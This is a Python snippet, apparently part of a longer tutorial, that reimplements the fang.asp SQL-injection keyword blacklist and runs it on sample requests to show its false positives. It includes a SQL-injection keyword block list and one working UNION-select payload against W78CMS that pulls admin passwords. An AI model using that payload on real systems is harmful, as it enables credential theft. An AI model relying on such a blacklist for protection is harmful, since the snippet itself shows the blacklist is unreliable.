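FANGZHU_IN = "'|;|and|(|)|exec|insert|select|union|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FANGZHU_INF = FANGZHU_IN.split("|")


def first_bad_token(value):
    """Instr(LCase(value), token) <> 0 for each token: a case-insensitive substring match.
    Returns the first matching token, or None if fang.asp would let the value through."""
    low = str(value).lower()
    for token in FANGZHU_INF:
        if token in low:
            return token
    return None


def fang_filter(form, query):
    """Scan every POST field, then every GET field, in the same order as fang.asp.
    Returns (collection, field, token) for the first hit, or None when the request passes.
    Cookies, headers and server variables are not visible here, just as in fang.asp."""
    for collection, fields in (("Request.Form", form), ("Request.QueryString", query)):
        for name, value in fields.items():
            token = first_bad_token(value)
            if token is not None:
                return (collection, name, token)
    return None


# Constructed sample requests (form fields, query-string fields). The first carries the
# W78CMS about.asp payload shown in piece 3 (URL-decoded); the rest are ordinary input.
SAMPLES = {
    "w78_about":   ({}, {"id": "2 and 1=2 union select 1,admin,3,password,5,6 from admin"}),
    "plain_id":    ({}, {"id": "13"}),
    "author_name": ({"author": "Sandra"}, {}),             # 'and' inside 'Sandra'
    "news_title":  ({"form_news": "Midnight report"}, {}),  # 'mid' inside 'Midnight'
    "irish_name":  ({"author": "O'Brien"}, {}),            # apostrophe in a legitimate name
}


def run_samples():
    """Verdict for every constructed request: None means allowed, a tuple means blocked."""
    return {name: fang_filter(form, query) for name, (form, query) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:12s} -> " + (f"blocked on {verdict!r}" if verdict else "allowed"))
```

Only the first sample is an attack; the three false positives show why a keyword blacklist cannot replace parameterized queries such as those in the piece 2 example.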
